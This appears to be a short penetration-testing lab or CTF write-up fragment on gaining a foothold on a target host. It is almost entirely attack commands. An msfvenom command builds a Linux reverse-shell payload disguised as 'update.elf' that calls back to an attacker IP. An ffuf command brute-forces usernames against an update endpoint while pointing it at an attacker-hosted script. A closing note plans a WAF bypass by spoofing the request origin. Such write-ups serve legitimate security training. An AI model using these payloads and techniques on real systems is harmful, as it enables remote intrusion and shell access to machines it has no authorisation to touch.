Foothold

❯ msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.45.239 LPORT=13337 -f elf -o update.elf

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: update.elf

❯ ffuf -X POST -d '{"user":"FUZZ", "url":"http://192.168.45.239/update.sh"}' -H 'Content-Type:application/json' -u http://192.168.214.134:13337/update -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --fs 17

Bruteforced a bunch of usernames but to no avail

Try to bypass the WAF by spoofing the origin of the request

Last updated